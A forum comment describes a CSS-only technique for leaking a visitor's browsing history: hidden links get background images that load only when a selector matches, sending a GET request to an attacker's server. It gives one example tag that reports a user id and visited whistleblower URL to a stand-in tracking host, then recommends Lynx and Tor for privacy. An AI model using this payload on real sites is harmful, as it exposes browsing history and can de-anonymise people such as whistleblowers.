|
|
|
|
|
|
by reneberlin
3605 days ago
|
|
|
You would use background-images for the links - they will trigger the parametrized GET to the server. Present browsers only load the image if it is visible and not hidden ("display:none"). They can be transparent 1px - they just need to be turned visible one by one if a slecetor fits. For example: you'd hide every link, except the one that should trigger a GET to the attackers server to leave the information there. Easy - and with cascaded :NOT and ~ selectors you can accomplish this on scale. The links would look something like this: <a href="https://secretsiteone.com/whistleblower/form" style="background-image: (url://uncloakwhistleblowers.com/img/transp.gif?checkeduser=id12345&vistedurl=secretsiteone.com%2Fwhistleblower%2Fform)"> A while back i demonstrated that a website without JS can trigger GET-requests BY HOVERING A LINK. My coworkers didn't believe me - they were wrong.
Caveats: When caching is enabled this attack will trigger just once - but that is enough in that case. I found the codepen, that i had made back then: http://codepen.io/teamgroove/pen/mIxfg USE LYNX: Turns out one shouldn't just turnoff JS - but images also. Maybe then better use: lynx as a browser (with all cookie-stuff-deavtivated and behind a tor-proxy or better: proxy-chains) if concerned about privacy. Even that will NOT be "secure enough" - of course - it just wouldn't expose your browsing-history in the first place - which was the topic. |
|
|